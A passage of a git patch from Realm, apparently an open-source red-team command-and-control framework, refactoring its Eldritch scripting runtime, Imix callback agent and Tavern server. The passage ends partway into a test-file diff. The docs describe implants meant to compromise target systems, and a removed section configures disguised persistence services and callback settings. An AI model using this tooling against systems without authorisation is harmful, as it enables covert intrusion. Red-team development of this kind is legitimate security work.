From bfd1eb96000e9960b117bef8611d215d79e364da Mon Sep 17 00:00:00 2001 From: KCarretto Date: Sat, 27 Jan 2024 01:15:20 -0500 Subject: [PATCH] [feature] Eldritch & Imix Refactor (#509) * Refactors eldritch, introduces `eldritch::Runtime` * Refactors imix, introduces `imix::Agent` and `imix::Config` * Refactors our protobufs, creating new `eldritch` package for language specific types --- README.md | 24 +- bin/golem_cli_test/eldritch_test.tome | 2 +- bin/golem_cli_test/hello_world.tome | 2 +- docs/_docs/dev-guide/introduction.md | 44 +- docs/_docs/user-guide/imix.md | 58 +- go.mod | 2 +- go.sum | 8 +- implants/Cargo.toml | 2 + implants/golem/Cargo.toml | 2 +- implants/golem/src/inter/eval.rs | 2 +- implants/golem/src/main.rs | 144 ++- implants/golem/tests/cli.rs | 4 +- implants/imix/Cargo.toml | 4 +- .../{main.eld => main.eldritch} | 0 implants/imix/src/agent.rs | 127 ++ implants/imix/src/config.rs | 202 +++ implants/imix/src/exec.rs | 215 ---- implants/imix/src/init.rs | 306 ----- implants/imix/src/install.rs | 170 +-- implants/imix/src/lib.rs | 65 +- implants/imix/src/main.rs | 441 +------ implants/imix/src/task.rs | 97 ++ implants/imix/src/tasks.rs | 308 ----- implants/imix/src/version.rs | 7 + implants/lib/c2/Cargo.toml | 4 +- implants/lib/c2/build.rs | 4 +- implants/lib/c2/src/c2.rs | 133 +- implants/lib/c2/src/c2_manual.rs | 278 +++-- implants/lib/c2/src/lib.rs | 4 +- implants/lib/eldritch/Cargo.toml | 12 +- implants/lib/eldritch/build.rs | 37 +- implants/lib/eldritch/src/eldritch.rs | 138 +++ implants/lib/eldritch/src/lib.rs | 302 +---- .../lib/eldritch/src/pivot/arp_scan_impl.rs | 2 +- implants/lib/eldritch/src/runtime.rs | 550 +++++++++ implants/lib/tavern/graphql/schema.graphql | 1081 ----------------- tavern/internal/c2/api_claim_tasks.go | 13 +- tavern/internal/c2/api_report_file.go | 17 +- tavern/internal/c2/api_report_file_test.go | 45 +- tavern/internal/c2/api_report_process_list.go | 6 +- .../c2/api_report_process_list_test.go | 37 +- tavern/internal/c2/c2pb/c2.pb.go | 712 +++-------- tavern/internal/c2/c2test/ent.go | 17 +- tavern/internal/c2/epb/eldritch.pb.go | 602 +++++++++ .../c2/{c2pb => epb}/enum_process_status.go | 2 +- .../{c2pb => epb}/enum_process_status_test.go | 32 +- tavern/internal/c2/generate.go | 3 +- tavern/internal/c2/{ => proto}/c2.proto | 54 +- tavern/internal/c2/proto/eldritch.proto | 61 + tavern/internal/ent/gql_where_input.go | 9 +- tavern/internal/ent/host/host.go | 2 +- tavern/internal/ent/hostprocess.go | 8 +- .../internal/ent/hostprocess/hostprocess.go | 14 +- tavern/internal/ent/hostprocess/where.go | 10 +- tavern/internal/ent/hostprocess_create.go | 12 +- tavern/internal/ent/hostprocess_update.go | 10 +- tavern/internal/ent/migrate/schema.go | 4 +- tavern/internal/ent/mutation.go | 13 +- tavern/internal/ent/schema/host_process.go | 4 +- .../graphql/generated/ent.generated.go | 35 +- .../graphql/generated/root_.generated.go | 22 +- tavern/internal/graphql/gqlgen.yml | 2 +- tavern/internal/graphql/schema.graphql | 22 +- tavern/internal/graphql/schema/ent.graphql | 22 +- tavern/internal/www/schema.graphql | 22 +- 65 files changed, 2646 insertions(+), 3947 deletions(-) rename implants/imix/install_scripts/install_service/{main.eld => main.eldritch} (100%) create mode 100644 implants/imix/src/agent.rs create mode 100644 implants/imix/src/config.rs delete mode 100644 implants/imix/src/exec.rs delete mode 100644 implants/imix/src/init.rs create mode 100644 implants/imix/src/task.rs delete mode 100644 implants/imix/src/tasks.rs create mode 100644 implants/imix/src/version.rs create mode 100644 implants/lib/eldritch/src/eldritch.rs create mode 100644 implants/lib/eldritch/src/runtime.rs delete mode 100644 implants/lib/tavern/graphql/schema.graphql create mode 100644 tavern/internal/c2/epb/eldritch.pb.go rename tavern/internal/c2/{c2pb => epb}/enum_process_status.go (99%) rename tavern/internal/c2/{c2pb => epb}/enum_process_status_test.go (58%) rename tavern/internal/c2/{ => proto}/c2.proto (76%) create mode 100644 tavern/internal/c2/proto/eldritch.proto diff --git a/README.md b/README.md index 8874d7be0..50d0b8135 100644 --- a/README.md +++ b/README.md @@ -60,29 +60,7 @@ ENABLE_TEST_DATA=1 go run ./tavern ```bash git clone https://github.com/spellshift/realm.git -cd realm/implants/imix - -# Create the config file -cat < /tmp/imix-config.json -{ - "service_configs": [], - "target_forward_connect_ip": "127.0.0.1", - "target_name": "test1234", - "callback_config": { - "interval": 4, - "jitter": 1, - "timeout": 4, - "c2_configs": [ - { - "priority": 1, - "uri": "http://127.0.0.1/grpc/" - } - ] - } -} -EOF - -cargo run -- -c /tmp/imix-config.json +cd realm/implants/imix && cargo run ``` diff --git a/bin/golem_cli_test/eldritch_test.tome b/bin/golem_cli_test/eldritch_test.tome index e9b1cd590..687a23062 100644 --- a/bin/golem_cli_test/eldritch_test.tome +++ b/bin/golem_cli_test/eldritch_test.tome @@ -1 +1 @@ -str(dir(file)) \ No newline at end of file +print(dir(file)) diff --git a/bin/golem_cli_test/hello_world.tome b/bin/golem_cli_test/hello_world.tome index 6ec99703f..239e5304a 100644 --- a/bin/golem_cli_test/hello_world.tome +++ b/bin/golem_cli_test/hello_world.tome @@ -4,4 +4,4 @@ def test(): res = res + i return res -str(test()) \ No newline at end of file +print(test()) diff --git a/docs/_docs/dev-guide/introduction.md b/docs/_docs/dev-guide/introduction.md index e11655faf..f62d84527 100644 --- a/docs/_docs/dev-guide/introduction.md +++ b/docs/_docs/dev-guide/introduction.md @@ -6,11 +6,13 @@ description: Read this before contributing to Realm! permalink: dev-guide/introduction --- # Overview + This section of the documentation is meant for new Realm-contributors, and should be read in it's entirety before submitting your first PR. Below you can learn more about our testing & documentation requirements, project layout, and some of the internals of our codebase. ## Contribution Guidelines ### Documentation + Realm is under heavy active development and documentation can go stale quickly if it's not actively maintained. Please take a moment to familiarize yourself with both the **[Developer Documentation](/dev-guide)** you're reading now as well as the **[User-Facing Documentation](/user-guide)**. When submitting a code change, please include updates to the relevant portions of our documentation. We will do our best during code review to catch changes that require documentation updates, but sometimes things will slip by. If you notice a discrepancy between our codebase and the documentation, please kindly [file an issue](https://github.com/spellshift/realm/issues/new?labels=documentation&title=Documentation%20Discrepancy:&body=Please%20include%20the%20location%20of%20the%20inaccurate%20documentation%20and%20a%20helpful%20description%20of%20what%20needs%20improvement.) to track it or submit a PR to correct it. You can use the ["Edit this page"](https://github.com/spellshift/realm/edit/main/docs/_docs/dev-guide/introduction.md) feature in the right navbar of the documentation to quickly navigate to the appropriate section of documentation that requires an update. @@ -22,14 +24,17 @@ Realm contains code across a variety of languages and frameworks. Testing helps #### Eldritch Any methods added to the Eldritch Standard Library should have tests collocated in the method's `_impl.rs` file. Here are a few things to keep in mind: + * Tests should be cross platform - * Rely on [NamedTempFile](https://docs.rs/tempfile/1.1.1/tempfile/struct.NamedTempFile.html) for temporary files - * Rely on [path.join](https://doc.rust-lang.org/stable/std/path/struct.Path.html) to construct OS-agnostic paths + * Rely on [NamedTempFile](https://docs.rs/tempfile/1.1.1/tempfile/struct.NamedTempFile.html) for temporary files + * Rely on [path.join](https://doc.rust-lang.org/stable/std/path/struct.Path.html) to construct OS-agnostic paths #### Tavern ##### Tavern Tests (Golang) + All code changes to Tavern must be tested. Below are some standards for test writing that can help improve your PRs: + * Please submit relevant tests in the same PR as your code change * For GraphQL API Tests, please refer to our [YAML specification](/dev-guide/tavern#yaml-test-reference-graphql) * For gRPC API Tests, please refer to our [YAML specification](/dev-guide/tavern#yaml-test-reference-grpc) @@ -37,11 +42,12 @@ All code changes to Tavern must be tested. Below are some standards for test wri * We rely on the standard [testify](https://github.com/stretchr/testify) assert & require libraries for ensuring expected values (or errors) are returned * To enable a variety of inputs for a test case, we rely on closure-driven testing for Golang, you can read more about it [here](https://medium.com/@cep21/closure-driven-tests-an-alternative-style-to-table-driven-tests-in-go-628a41497e5e) * Reusable test code should go in a sub-package suffixed with test - * For example, reusable test code for the `ent` package would be located in the `ent/enttest` package - * This convention is even used in the Golang standard library (e.g. [net/http](https://pkg.go.dev/net/http/httptest)) + * For example, reusable test code for the `ent` package would be located in the `ent/enttest` package + * This convention is even used in the Golang standard library (e.g. [net/http](https://pkg.go.dev/net/http/httptest)) * Please use existing tests as a reference for writing new tests ##### Tavern Tests (Front End) + At the time of writing, the Tavern UI is still in an early stage, and therefore minimal testing exists for it. Once the UI is considered more stable, this documentation will be updated. If the Tavern UI is useable and this documentation still exists, please [file an issue](https://github.com/spellshift/realm/issues/new?labels=documentation&title=Documentation%20Discrepancy:&body=Please%20include%20the%20location%20of%20the%20inaccurate%20documentation%20and%20a%20helpful%20description%20of%20what%20needs%20improvement.). ### Linear History @@ -53,47 +59,55 @@ In an attempt to reduce the complexity of merges, we enforce a linear history fo Throughout the documentation terms like "agent" or "implant" are used to reference various components (or types of components) in our codebase. Below we attempt to define some of those terms, to add some clarity to that other documentation. ### Host + A Host is a system that is in-scope for the current engagement. It is used to establish a logical boundary between different systems in an engagement (e.g. between a webserver and a database). This enables operations to target a particular system, for example you may want to list files on a web server in your engagement scope. ### Implant + References malicious code or persistence mechanisms that are deployed to compromise target systems. ### Agent + An Agent is a type of implant which retrieves execution instructions by connecting to our backend infrastructure (calling back) and querying for new tasks. ### Beacon + A Beacon is a running instance of an Agent. A Host may have multiple active Beacons that use the same underlying Agent. ### Task + A Task represents a set of instructions for an Agent to perform. For example, listing files could be a Task. When listing files across various Beacons, one Task per Beacon will be created for tracking the individual execution output. ### Eldritch + Eldritch is our Pythonic Domain Specific Language (DSL), which can be used to progammatically define red team operations. Many of the language's built-in features do not rely on system binaries. For more information, please see the [Eldritch section](/user-guide/eldritch) of the documentation. ### Tome + A Tome is a prebuilt Eldritch bundle, which provides execution instructions to a Beacon. Tomes can embed files and accept parameters to change their behavior at runtime. Tavern's built-in Tomes are defined [here](https://github.com/spellshift/realm/tree/main/tavern/tomes). # Project Structure + * **[.devcontainer](https://github.com/spellshift/realm/tree/main/.devcontainer)** contains settings required for configuring a VSCode dev container that can be used for Realm development * **[.github](https://github.com/spellshift/realm/tree/main/.github)** contains GitHub related actions, issue templates, etc * **[docker](https://github.com/spellshift/realm/tree/main/docker)** docker containers for production builds * **[docs](https://github.com/spellshift/realm/tree/main/docs)** contains the Jekyll code for the documentation site that you're reading now! * **[implants](https://github.com/spellshift/realm/tree/main/implants)** is the parent folder of any implant executables or libraries - * **[implants/golem](https://github.com/spellshift/realm/tree/main/implants/golem)** the stand-alone interpreter that implements the eldritch language (Rust) - * **[implants/golem/embed_files_golem_prod](https://github.com/spellshift/realm/tree/main/implants/golem/embed_files_golem_prod)** Files and scripts that will be embedded into production builds of imix, golem, and eldritch. These files can be accessed through the [`assets` module.](https://docs.realm.pub/user-guide/eldritch#assets) - * **[implants/imix](https://github.com/spellshift/realm/tree/main/implants/imix)** is our agent that executes eldritch tomes (Rust) - * **[implants/lib/eldritch](https://github.com/spellshift/realm/tree/main/implants/lib/eldritch)** is the source of our eldritch library (Rust) - * **[implants/lib/tavern](https://github.com/spellshift/realm/tree/main/implants/lib/tavern)** is the source of our agents graphql API to interface with Tavern (Rust) + * **[implants/golem](https://github.com/spellshift/realm/tree/main/implants/golem)** the stand-alone interpreter that implements the eldritch language (Rust) + * **[implants/golem/embed_files_golem_prod](https://github.com/spellshift/realm/tree/main/implants/golem/embed_files_golem_prod)** Files and scripts that will be embedded into production builds of imix, golem, and eldritch. These files can be accessed through the [`assets` module.](https://docs.realm.pub/user-guide/eldritch#assets) + * **[implants/imix](https://github.com/spellshift/realm/tree/main/implants/imix)** is our agent that executes eldritch tomes (Rust) + * **[implants/lib/eldritch](https://github.com/spellshift/realm/tree/main/implants/lib/eldritch)** is the source of our eldritch library (Rust) * **[tavern](https://github.com/spellshift/realm/tree/main/tavern)** is the parent folder of Tavern related code and packages, and stores the `main.go` executable for the service - * **[tavern/auth](https://github.com/spellshift/realm/tree/main/tavern/auth)** is a package for managing authentication for Tavern, and is used by various packages that rely on obtaining viewer information - * **[tavern/internal/ent](https://github.com/spellshift/realm/tree/main/tavern/internal/ent)** contains models and related code for interacting with the database (most of this is code generated by **[entgo](https://entgo.io/))** - * **[tavern/internal/ent/schema](https://github.com/spellshift/realm/tree/main/tavern/internal/ent/schema)** contains the schema definitions for our DB models - * **[tavern/internal/graphql](https://github.com/spellshift/realm/tree/main/tavern/internal/graphql)** contains our GraphQL definitions and resolvers (most of this code is generated by **[entgo](https://entgo.io/)** and **[gqlgen](https://github.com/99designs/gqlgen))** - * **[tavern/internal](https://github.com/spellshift/realm/tree/main/tavern/internal)** contains various internal packages that makeup Tavern - * **[tavern/internal/www](https://github.com/spellshift/realm/tree/main/tavern/internal/www)** contains Tavern's UI code + * **[tavern/auth](https://github.com/spellshift/realm/tree/main/tavern/auth)** is a package for managing authentication for Tavern, and is used by various packages that rely on obtaining viewer information + * **[tavern/internal/ent](https://github.com/spellshift/realm/tree/main/tavern/internal/ent)** contains models and related code for interacting with the database (most of this is code generated by **[entgo](https://entgo.io/))** + * **[tavern/internal/ent/schema](https://github.com/spellshift/realm/tree/main/tavern/internal/ent/schema)** contains the schema definitions for our DB models + * **[tavern/internal/graphql](https://github.com/spellshift/realm/tree/main/tavern/internal/graphql)** contains our GraphQL definitions and resolvers (most of this code is generated by **[entgo](https://entgo.io/)** and **[gqlgen](https://github.com/99designs/gqlgen))** + * **[tavern/internal](https://github.com/spellshift/realm/tree/main/tavern/internal)** contains various internal packages that makeup Tavern + * **[tavern/internal/www](https://github.com/spellshift/realm/tree/main/tavern/internal/www)** contains Tavern's UI code * **[terraform](https://github.com/spellshift/realm/tree/main/terraform)** contains the Terraform used to deploy a production ready Realm instance. See [Tavern User Guide](https://docs.realm.pub/user-guide/tavern) to learn how to use. * **[tests](https://github.com/spellshift/realm/tree/main/tests)** miscellaneous files and example code used for testing. Generally won't be used but required for some niche situations like deadlocking cargo build. * **[vscode](https://github.com/spellshift/realm/tree/main/vscode)** contains our Eldritch VSCode integration source code **(Unmaintained)** # Where to Start? + If you'd like to make a contribution to Realm but aren't sure where to start or what features could use help, please consult our [Good First Issues](https://github.com/spellshift/realm/labels/good%20first%20issue) for some starting ideas. diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index 4f6220303..20f348466 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -8,61 +8,21 @@ permalink: user-guide/imix ## What is Imix Imix is the default agent for realm. -Imix currently only supports http callbacks which interact directly with the graphql API. +Imix currently only supports http(s) callbacks to Tavern's gRPC API. ## Configuration -By default Imix is configured using a JSON file at run time. +Imix has compile-time configuration, that may be specified using environment variables during `cargo build`. -The config is specified at run time with the `-c` flag. -For example: +| Env Var | Description | Default | Required | +| ------- | ----------- | ------- | -------- | +| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://`) | `http://127.0.0.1:80` | No | +| IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | +| IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | -```bash -./imix -c /tmp/imix-config.json -``` - -The imix config is as follows: - -```json -{ - "service_configs": [ - { - "name": "imix", - "description": "Imix c2 agent", - "executable_name": "imix", - "executable_args": "" - } - ], - "target_forward_connect_ip": "127.0.0.1", - "target_name": "test1234", - "callback_config": { - "interval": 4, - "jitter": 1, - "timeout": 4, - "c2_configs": [ - { - "priority": 1, - "uri": "http://127.0.0.1/grpc" - } - ] - } -} -``` +## Logging -- `service_configs`: Defining persistence variables. - - `name`: The name of the service to install as. - - `description`: If possible set a description for the service. - - `executable_name`: What imix should be named Eg. `not-supicious-serviced`. - - `executable_args`: Args to append after the executable. -- `target_forward_connect_ip`: The IP address that you the red teamer would interact with the host through. This is to help keep track of agents when a hosts internal IP is different from the one you interact with in the case of a host behind a proxy. -- `target_name`: Currently unused. -- `callback_config`: Define where and when the agent should callback. - - `interval`: Number of seconds between callbacks. - - `jitter`: Currently unused. - - `timeout`: The number of seconds to wait before aborting a connection attempt. - - `c2_config` Define where the c2 should callback to. - - `priority`: The index that a domain should have. - - `uri`: The full URI of the callback endpoint. +At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. When building a release version of imix, logging is disabled and is not included in the released binary. ## Installation diff --git a/go.mod b/go.mod index 1b3a04926..b1a37341a 100644 --- a/go.mod +++ b/go.mod @@ -12,6 +12,7 @@ require ( github.com/google/go-cmp v0.6.0 github.com/hashicorp/go-multierror v1.1.1 github.com/mattn/go-sqlite3 v1.14.16 + github.com/prometheus/client_golang v1.18.0 github.com/stretchr/testify v1.8.2 github.com/urfave/cli v1.22.5 github.com/vektah/gqlparser/v2 v2.5.10 @@ -45,7 +46,6 @@ require ( github.com/mitchellh/go-wordwrap v1.0.1 // indirect github.com/mitchellh/mapstructure v1.5.0 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect - github.com/prometheus/client_golang v1.18.0 // indirect github.com/prometheus/client_model v0.5.0 // indirect github.com/prometheus/common v0.45.0 // indirect github.com/prometheus/procfs v0.12.0 // indirect diff --git a/go.sum b/go.sum index cbbd0abfc..a4e4917f8 100644 --- a/go.sum +++ b/go.sum @@ -60,7 +60,6 @@ github.com/hashicorp/golang-lru/v2 v2.0.3 h1:kmRrRLlInXvng0SmLxmQpQkpbYAvcXm7NPD github.com/hashicorp/golang-lru/v2 v2.0.3/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM= github.com/hashicorp/hcl/v2 v2.18.1 h1:6nxnOJFku1EuSawSD81fuviYUV8DxFr3fp2dUi3ZYSo= github.com/hashicorp/hcl/v2 v2.18.1/go.mod h1:ThLC89FV4p9MPW804KVbe/cEXoQ8NZEh+JtMeeGErHE= -github.com/kr/pretty v0.1.0 h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI= github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE= github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= github.com/kylelemons/godebug v0.0.0-20170820004349-d65d576e9348 h1:MtvEpTB6LX3vkb4ax0b5D2DHbNAUsen0Gx5wZoq3lV4= @@ -82,6 +81,7 @@ github.com/prometheus/common v0.45.0 h1:2BGz0eBc2hdMDLnO/8n0jeB3oPrt2D08CekT0lne github.com/prometheus/common v0.45.0/go.mod h1:YJmSTw9BoKxJplESWWxlbyttQR4uaEcGyv9MZjVOJsY= github.com/prometheus/procfs v0.12.0 h1:jluTpSng7V9hY0O2R9DzzJHYb2xULk9VTR1V1R/k6Bo= github.com/prometheus/procfs v0.12.0/go.mod h1:pcuDEFsWDnvcgNzo4EEweacyhjeA9Zk3cnaOZAZEfOo= +github.com/rogpeppe/go-internal v1.10.0 h1:TMyTOH3F/DB16zRVcYyreMH6GnZZrwQVAoYjRBZyWFQ= github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= github.com/russross/blackfriday/v2 v2.1.0 h1:JIOH55/0cWyOuilr9/qlrm0BSXldqnqwMsf35Ld67mk= github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= @@ -117,15 +117,11 @@ golang.org/x/mod v0.13.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks= golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM= golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE= -golang.org/x/oauth2 v0.11.0 h1:vPL4xzxBM4niKCW6g9whtaWVXTJf1U5e4aZxxFx/gbU= -golang.org/x/oauth2 v0.11.0/go.mod h1:LdF7O/8bLR/qWK9DrpXmbHLTouvRHK0SgJl0GmDBchk= golang.org/x/oauth2 v0.12.0 h1:smVPGxink+n1ZI5pkQa8y6fZT0RW0MgCO5bFpepy4B4= golang.org/x/oauth2 v0.12.0/go.mod h1:A74bZ3aGXgCY0qaIC9Ahg6Lglin4AMAco8cIv9baba4= golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ= golang.org/x/sync v0.4.0/go.mod h1:FU7BRWz2tNW+3quACPkgCx/L+uEAv1htQ0V83Z9Rj+Y= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE= -golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.15.0 h1:h48lPFYpsTvQJZF4EKyI4aLHaev3CxivZmv7yZig9pc= golang.org/x/sys v0.15.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= @@ -146,8 +142,8 @@ google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp0 google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= google.golang.org/protobuf v1.32.0 h1:pPC6BG5ex8PDFnkbrGU3EixyhKcQ2aDuBS36lqK/C7I= google.golang.org/protobuf v1.32.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos= -gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/implants/Cargo.toml b/implants/Cargo.toml index a6f4fbb0a..e8d293edc 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -27,6 +27,7 @@ hyper = { version = "1", features = ["full"] } ipnetwork = "0.20.0" itertools = "0.10" lsp-types = "0.93.0" +log = "0.4.20" md5 = "0.7.0" netstat2 = "0.9.1" network-interface = "1.0.1" @@ -35,6 +36,7 @@ object = "0.31.1" openssl = "0.10.55" pnet = "0.34.0" predicates = "2.1" +pretty_env_logger = "0.5.0" prost = "0.12" prost-types = "0.12" rand = "0.8.5" diff --git a/implants/golem/Cargo.toml b/implants/golem/Cargo.toml index 21f373504..af9326984 100644 --- a/implants/golem/Cargo.toml +++ b/implants/golem/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "golem" -version = "0.0.4" +version = "0.0.5" edition = "2021" [dependencies] diff --git a/implants/golem/src/inter/eval.rs b/implants/golem/src/inter/eval.rs index 4d6b5556c..9016f5563 100644 --- a/implants/golem/src/inter/eval.rs +++ b/implants/golem/src/inter/eval.rs @@ -369,7 +369,7 @@ impl LspContext for Context { } pub(crate) fn globals() -> Globals { - eldritch::get_eldritch().unwrap() + eldritch::Runtime::globals() } pub(crate) fn dialect() -> Dialect { diff --git a/implants/golem/src/main.rs b/implants/golem/src/main.rs index 3588a1269..787a18b87 100644 --- a/implants/golem/src/main.rs +++ b/implants/golem/src/main.rs @@ -1,50 +1,68 @@ extern crate eldritch; extern crate golem; +use anyhow::{anyhow, Result}; use clap::{Arg, Command}; +use eldritch::pb::Tome; +use eldritch::{Output, Runtime}; +use std::collections::HashMap; use std::fs; use std::process; -use std::thread; - -use eldritch::{eldritch_run, StdPrintHandler}; +use tokio::task::JoinHandle; mod inter; -async fn execute_tomes_in_parallel( - tome_name_and_content: Vec<(String, String)>, -) -> anyhow::Result<(i32, Vec)> { - // Queue async tasks - let mut all_tome_futures: Vec<(String, _)> = vec![]; - for tome_data in tome_name_and_content { - let tmp_row = ( - tome_data.0.clone().to_string(), - thread::spawn(|| eldritch_run(tome_data.0, tome_data.1, None, &StdPrintHandler {})), - ); - all_tome_futures.push(tmp_row) +struct ParsedTome { + pub path: String, + pub eldritch: String, +} + +struct Handle { + handle: JoinHandle<()>, + path: String, + output: Output, +} + +async fn run_tomes(tomes: Vec) -> Result> { + let mut handles = Vec::new(); + for tome in tomes { + let (runtime, output) = Runtime::new(); + let handle = tokio::task::spawn_blocking(move || { + runtime.run(Tome { + eldritch: tome.eldritch, + parameters: HashMap::new(), + file_names: Vec::new(), + }); + }); + handles.push(Handle { + handle, + path: tome.path, + output, + }); } - let mut error_code = 0; - let mut result: Vec = Vec::new(); - for tome_task in all_tome_futures { - let tome_name: String = tome_task.0; - // Join our - let tome_result_thread_join = match tome_task.1.join() { - Ok(local_thread_join_res) => local_thread_join_res, - Err(_) => { - error_code = 1; - Err(anyhow::anyhow!("An error occured waiting for the tome thread to complete while executing {tome_name}.")) + let mut result = Vec::new(); + for handle in handles { + match handle.handle.await { + Ok(_) => {} + Err(err) => { + eprintln!( + "error waiting for tome to complete: {} {}", + handle.path, err + ); + continue; } }; - - match tome_result_thread_join { - Ok(local_tome_result) => result.push(local_tome_result), - Err(task_error) => { - error_code = 1; - eprintln!("[TASK ERROR] {tome_name}: {task_error}"); - } + let mut out = handle.output.collect(); + let errors = handle.output.collect_errors(); + if errors.len() > 0 { + return Err(anyhow!("tome execution failed: {:?}", errors)); } + println!("OUTPUT: {:?}", out); + result.append(&mut out); } - Ok((error_code, result)) + + Ok(result) } fn main() -> anyhow::Result<()> { @@ -65,14 +83,16 @@ fn main() -> anyhow::Result<()> { .get_matches(); if matches.contains_id("INPUT") { - // Get list of files + // Read Tomes let tome_files = matches.try_get_many::("INPUT").unwrap().unwrap(); - - let mut tome_files_and_content: Vec<(String, String)> = Vec::new(); + let mut parsed_tomes: Vec = Vec::new(); for tome in tome_files { let tome_path = tome.to_string().clone(); let tome_contents = fs::read_to_string(tome_path.clone())?; - tome_files_and_content.push((tome_path, tome_contents)) + parsed_tomes.push(ParsedTome { + path: tome_path, + eldritch: tome_contents, + }); } let runtime = tokio::runtime::Builder::new_multi_thread() @@ -80,14 +100,13 @@ fn main() -> anyhow::Result<()> { .build() .unwrap(); - let (error_code, result) = - match runtime.block_on(execute_tomes_in_parallel(tome_files_and_content)) { - Ok(response) => response, - Err(error) => { - println!("Error executing tomes {:?}", error); - (-1, Vec::new()) - } - }; + let (error_code, result) = match runtime.block_on(run_tomes(parsed_tomes)) { + Ok(response) => (0, response), + Err(error) => { + eprint!("failed to execute tome {:?}", error); + (-1, Vec::new()) + } + }; if result.len() > 0 { println!("{:?}", result); @@ -96,7 +115,7 @@ fn main() -> anyhow::Result<()> { } else if matches.contains_id("interactive") { inter::interactive_main()?; } else { - let mut tome_files_and_content: Vec<(String, String)> = Vec::new(); + let mut parsed_tomes: Vec = Vec::new(); for embedded_file_path in eldritch::assets::Asset::iter() { let filename = match embedded_file_path.split(r#"/"#).last() { Some(local_filename) => local_filename, @@ -123,7 +142,10 @@ fn main() -> anyhow::Result<()> { "".to_string() } }; - tome_files_and_content.push((tome_path, tome_contents)) + parsed_tomes.push(ParsedTome { + path: tome_path, + eldritch: tome_contents, + }); } } let runtime = tokio::runtime::Builder::new_current_thread() @@ -131,14 +153,13 @@ fn main() -> anyhow::Result<()> { .build() .unwrap(); - let (error_code, result) = - match runtime.block_on(execute_tomes_in_parallel(tome_files_and_content)) { - Ok(response) => response, - Err(error) => { - println!("Error executing tomes {:?}", error); - (-1, Vec::new()) - } - }; + let (error_code, result) = match runtime.block_on(run_tomes(parsed_tomes)) { + Ok(response) => (0, response), + Err(error) => { + eprint!("error executing tomes {:?}", error); + (-1, Vec::new()) + } + }; if result.len() > 0 { println!("{:?}", result); @@ -154,14 +175,13 @@ mod tests { use super::*; #[tokio::test] async fn test_golem_execute_tomes_in_parallel() -> anyhow::Result<()> { - let tome_files_and_content = [( - "test_hello.eldritch".to_string(), - "'hello world'".to_string(), - )]; - let (error_code, result) = - execute_tomes_in_parallel(tome_files_and_content.to_vec()).await?; - assert_eq!(error_code, 0); - assert!(result.contains(&"hello world".to_string())); + let parsed_tomes = Vec::from([ParsedTome { + path: "test_hello.eldritch".to_string(), + eldritch: r#"print("hello world")"#.to_string(), + }]); + + let out = run_tomes(parsed_tomes).await?; + assert_eq!("hello world".to_string(), out.join("")); Ok(()) } } diff --git a/implants/golem/tests/cli.rs b/implants/golem/tests/cli.rs index 652995c4b..cc84602a1 